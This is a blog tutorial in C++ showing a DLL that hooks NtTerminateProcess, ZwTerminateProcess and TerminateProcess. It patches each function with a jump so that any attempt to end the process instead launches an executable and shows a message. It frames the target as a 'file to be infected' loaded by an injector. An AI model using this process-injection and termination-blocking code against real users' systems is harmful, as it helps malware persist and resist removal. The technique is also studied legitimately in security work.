IAT hooking, detect turning off the app under the desktop

Details

IAT hooking, we detect turning off the app under the desktop.

 

In this tutorial I will refer to the articles >> Inline Hooking << and>>IAT Hooking <<



The pseudo-algorithm is as follows:
   -- We select / write a file to be infected
   -- We will write a library that will contain an IAT hooking (bypass) signal to terminate the program
   -- We'll write an injector that will load the library into the process of that file.

In the above articles, we described the injector as well as the library we want to hook into the process.

In this article, we'll make some changes to the library and add methods hooking:
   -> NtTerminateProcess (ntdll.dll)
   -> ZwTerminateProcess (ntdll.dll)
   -> TerminateProcess (kernel32.dll)

  
#include <windows.h> 
#include <iostream> 
#include "Convert.h"  //hhttps://www.netbot.sk/en/14-blog-headers/86-convert-h-en
#include "WinAPI.h"   //https://www.netbot.sk/en/14-blog-headers/44-winapi-en

DWORD SetHook(LPVOID inputMethod, LPVOID outputMethod) 
{ 
    DWORD oldProtection = 0; 
    bool resultvirtual = ::VirtualProtect(inputMethod, 7, PAGE_EXECUTE_READWRITE, &oldProtection); 

    if(resultvirtual == false) 
    { 
        return 0; 
    } 

    *(BYTE*)(inputMethod) = 0xE9; 
    *(long*)((LPBYTE)inputMethod+1) = ((DWORD)outputMethod - ((DWORD)inputMethod + 5)); 
    resultvirtual = VirtualProtect(inputMethod, 7, oldProtection, &oldProtection); 
    return resultvirtual; 

} 

NTSTATUS WINAPI HookedCall(HWND a, LPCSTR b, LPCSTR c, UINT d)
{
    STARTUPINFO  s_infoi;
    PROCESS_INFORMATION p_iinfoi;
    ZeroMemory( &s_infoi, sizeof(s_infoi) );

    /*if( !CreateProcessA( NULL, "d:\\prog.exe", NULL, NULL, FALSE, FALSE, 0, NULL, NULL ,
                        (LPSTARTUPINFOA)&s_infoi, &p_iinfoi ) ) */
 
    ::Diall_WinApi::WinApi::GetInstance()->ExecuteFile("d:\\prog.exe","",::Diall_WinApi::SelfWindow::SHOW);
    MessageBoxA(0, "Terminate was detected !", "Teerminating", MB_OK);
    return 0;
}

 
BOOL APIENTRY DllMain (HINSTANCE hInst, DWORD reason, LPVOID reserved) 
{ 
    switch (reason) 
    { 
      case DLL_PROCESS_ATTACH: 
        SetHook(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTerminateProcess"),(LPVOID) HookedCall);
        SetHook(GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwTerminateProcess"),(LPVOID) HookedCall);
        SetHook(GetProcAddress(GetModuleHandleA("kernel32.dll"), "TerminateProcess"),(LPVOID) HookedCall);

        break;

      case DLL_PROCESS_DETACH:
        break;

      case DLL_THREAD_ATTACH:
        break;

      case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}